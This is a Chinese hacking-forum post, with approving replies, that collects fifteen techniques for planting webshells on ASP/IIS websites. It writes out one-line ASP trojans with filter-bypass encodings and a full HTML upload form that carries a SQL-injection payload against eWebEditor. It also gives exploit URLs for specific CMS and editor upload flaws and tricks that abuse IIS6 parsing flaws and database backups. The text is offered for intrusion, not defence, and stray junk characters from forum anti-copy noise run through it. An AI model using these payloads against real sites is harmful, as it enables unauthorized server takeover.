返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
  x& R+ Q6 @7 C8 H1 K! V2 \& b2 q9 v# C. w& n4 b. b/ s
2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp  [) {( ^- |: J

. w  \" |: N" e+ w4 F/ y3.上传漏洞:! U4 B2 I# B2 J# v- ~. \& H7 ^

" K5 b" s; D  O: H' |( x动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
6 {" L. m2 E1 ?6 W% n
: [" B2 g5 x$ P4 t逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
% F( M  L$ T0 s: L( P4 B! ?
* S  I6 S7 N+ f# R3 p雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
9 E# B5 k1 I1 |/ u然后在上传文件里面填要传的图片格式的ASP木马/ o0 @5 e$ Y- C8 s$ D6 K
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
, y$ M& K; ]/ r8 w% u+ X1 N4 A4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
* D+ n/ w/ N8 ]
  O) [" F9 |! S% t; N0 k. M<html>
6 n! F+ f) t9 Z8 T. c<head>( h; j; s' a' P4 v
<title>ewebeditor upload.asp上传利用</title>
9 ~/ U5 }# ~+ R% Y5 e</head>
  Q* I  ~5 W) U; d( F3 Y( w<body>
, W# ]' f" X* Z. [  A<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">  B! U' W" U9 a( V3 Z* r6 R
<input type=file name=uploadfile size=100><br><br>5 ]7 A) Q% z$ k$ Q, H8 ~" R
<input type=submit value=Fuck>1 \1 F! r1 k- {' Q1 u) `! q
</form>: Z1 m7 K3 y: z' l  P
</body>
# \( O$ R  ]3 m& z/ I) a</form>! q. O' T2 C8 m  v3 {4 @) d6 m
</html>
1 W% Y7 i  b( @5 \$ j" K% z/ E# Y5 u0 `! l! ^
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问2 {4 _% [( k4 V* M; f2 s) p4 K2 Y3 W+ B
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
0 v/ p5 T- s# M# Q" Z0 H( |5 W1 f6 d: V- l0 `% t' h2 }
利用windows2003解析。建立zjq.asp的文件夹
7 }. z  D- \3 _) Z/ G8 j
" T4 Z4 o& s; q; Q9 Z& v# ^' |0 `8 j6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型# ^8 t+ c4 f" r: Z! |5 L- K
* h: t. G" D: |" Z0 i
7.cuteeditor:类似ewebeditor
4 o  P5 z1 v2 l4 `! U
* i" p" y7 P6 [9 e3 O* T- R8.htmleditor:同上
- }* C1 y% D6 k% l+ u
5 J$ O8 q: \0 u1 ]9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破& D7 M+ |- C$ {2 m  Z3 ]$ v: Z

3 w2 a' a( T$ C<%execute request("value")%><%'<% loop <%:%>3 c+ D3 z7 }' D
# N$ ~7 E# n+ |; D) z/ V* m1 j
<%'<% loop <%:%><%execute request("value")%>; P6 D" m( Q4 i: l$ L
9 f2 f3 C0 \2 g" ?! x8 I1 X% J
<%execute request("value")'<% loop <%:%>% a5 E5 U$ _3 E/ L; c$ Z
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞
. C  |8 R; T& @: S  {9 e+ m4 ^3 L" N5 d8 q( c" ]4 g3 e
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞1 p1 r7 U0 j) A9 ^

$ \! \3 G7 {8 ~! i11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
$ g5 `4 f: U8 S8 I+ g6 q; b$ _* m7 h* \" O+ p
解析漏洞得到webshell2 s  c) K9 T: \9 m
% ^5 L) d4 [- f  B/ V
12.mssql差异备份,日志备份,前提需知道web路径9 h! C1 f* C; Z3 ^) a$ F

0 S  S  d+ y6 g' ]9 r, j0 i" @- P13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell( a7 S* R8 q+ ~9 ~  L- S% Z
0 v! J, x6 z0 c! \* I
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
, G% k$ M# M5 z7 j
3 G/ T/ A0 j5 ?3 q% `15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
' c6 h$ @: O- @
; d; z0 u1 u! ?以上只是本人的一些拙见,并不完善,以后想到了再继续添加
( H* S! ?6 ]3 b+ _# o, B不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520 + M- A" Z# W' R
3 Z8 t! p2 S6 F1 C

$ `% m: M9 ], n" R% ?; @  b$ h很好啊、基本的入侵方法都包含了* H  |7 J5 U1 K
3 [1 B* n! `' z0 z1 Z# k; ]
最好来个提权的帖子再。
5 v8 U% j3 {: Y/ w6 [" G' A" x
. z2 J( S0 q2 Z5 H6 L3 n, W不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表